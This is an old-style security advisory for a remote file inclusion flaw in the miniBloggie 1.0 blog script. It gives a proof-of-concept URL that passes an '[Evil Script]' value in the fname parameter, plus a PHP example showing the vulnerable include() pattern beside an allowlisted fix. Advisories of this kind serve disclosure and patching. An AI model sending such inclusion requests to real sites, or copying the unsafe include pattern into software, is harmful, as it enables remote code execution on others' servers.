---------------------------------------------------------------------------------------
miniBloggie 1.0 fname Remote File Inclusion
---------------------------------------------------------------------------------------
Author : Sh3ll
Date : 2006/05/01
HomePage : http://www.sh3ll.ir
Contact : sh3ll[at]sh3ll[dot]ir
---------------------------------------------------------------------------------------
Affected Software Description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : miniBloggie
Version : 1.0
Vendor : http://www.mywebland.com
Class : Remote File Inclusion
Risk : High
Summary : miniBloggie is a small but effective blog script built on a fast template
system for easy customisation. It uses a MySQL database and supports editing, deleting,
smileys and BBCode, with an administrator login for easy website management.

---------------------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~
The problem is in cls_fast_template.php, where the variable $fname is passed to an
include() call without ever being declared or validated, so its value is taken
straight from the request.
---------------------------------cls_fast_template.php---------------------------------
....
http://www.target.com/[miniBloggie]/cls_fast_template.php?fname=[Evil Script]

Solution:
~~~~~~~~
Sanitize the variable $fname in cls_fast_template.php: declare it explicitly, take it
from the request only through a fixed list of allowed template names, and never pass a
user-supplied path or URL to include().
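The following is an added illustration of the fix described above; it is not miniBloggie's code. It contrasts the pattern the advisory describes (an undeclared $fname reaching include()) with an allowlisted version. The directory name, template names and function names are assumptions.

```php
<?php
// Added example, not part of miniBloggie. Models the defect the advisory
// describes and a hardened replacement. Paths and names are assumed.

// Vulnerable pattern: in the original, $fname is never declared, so with
// register_globals=On the query string populates it and include() loads
// whatever path or URL it names. Shown here as a parameter for clarity.
function render_template_vulnerable(string $fname): void
{
    include($fname);
}

// Hardened pattern: the request value is only a key into a fixed map of
// template files living in a directory the script controls (assumed path).
const TEMPLATE_DIR = __DIR__ . '/templates';
const TEMPLATES = [
    'index' => 'index.tpl.php',
    'post'  => 'post.tpl.php',
    'admin' => 'admin.tpl.php',
];

// Returns the absolute template path, or null if the name is not allowed
// or the resolved file would fall outside TEMPLATE_DIR.
function resolve_template(?string $name): ?string
{
    if ($name === null || !array_key_exists($name, TEMPLATES)) {
        return null;                       // unknown name: refuse
    }
    $base = realpath(TEMPLATE_DIR);
    $real = realpath(TEMPLATE_DIR . '/' . TEMPLATES[$name]);
    if ($base === false || $real === false) {
        return null;                       // missing dir or file
    }
    // realpath() has collapsed ../ and symlinks; confirm containment.
    if (strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

function render_template(?string $name): void
{
    $file = resolve_template($name);
    if ($file === null) {
        http_response_code(400);
        echo 'Unknown template';
        return;
    }
    include $file;
}

// Read the name explicitly instead of relying on register_globals.
render_template($_GET['fname'] ?? 'index');
```

With this in place, requests for names outside the map are rejected before include() runs, and a remote URL or traversal sequence can never become the include target.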
----------------------------------------------------------------------------------------
Note:
~~~~
Vendor contacted, but no response, so apply a workaround patch yourself.
----------------------------------------------------------------------------------------
Shoutz:
~~~~~~
~ Special Greetz to My Best Friend N4sh3n4s & My GF Atena
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams